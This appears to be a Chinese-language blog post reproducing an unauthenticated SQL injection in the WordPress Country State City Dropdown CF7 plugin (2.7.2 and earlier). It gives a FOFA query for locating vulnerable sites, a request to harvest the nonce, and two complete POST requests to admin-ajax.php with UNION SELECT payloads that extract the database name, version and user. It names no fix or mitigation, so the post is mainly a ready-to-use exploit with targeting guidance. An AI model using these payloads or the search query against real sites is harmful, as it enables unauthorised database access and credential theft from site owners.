Babing
Published on 2024-08-30 / 3 Visits
0
0

W18-1WordPress-CF7插件-SQL

W18-1WordPress-CF7插件-SQL

漏洞描述:

由于WordPress的Country State City Dropdown CF7插件在2.7.2及以下的版本中存在SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,导致凭证密钥等信息泄露,深入利用还可能会对服务器造成严重威胁。

影响版本:

Country State City Dropdown CF7 <= 2.7.2

fofa语法:

body=“/wp-content/plugins/country-state-city-auto-dropdown/”

漏洞复现:

访问首页获取nonce的值
payload:

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图:
效果图
携带 nonce的值进行注入
查询数据库名称+数据库版本+当前用户
payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

action=tc_csca_get_states&nonce_ajax=2c72d99abc&cnt=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-

效果图:
效果图

payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

action=tc_csca_get_cities&nonce_ajax=2c72d99abc&sid=1+or+0+union+select+concat%280x64617461626173653a%2Cdatabase%28%29%2C0x7c76657273696f6e3a%2Cversion%28%29%2C0x7c757365723a%2Cuser%28%29%29%2C2%2C3--+-

效果图:
效果图


Comment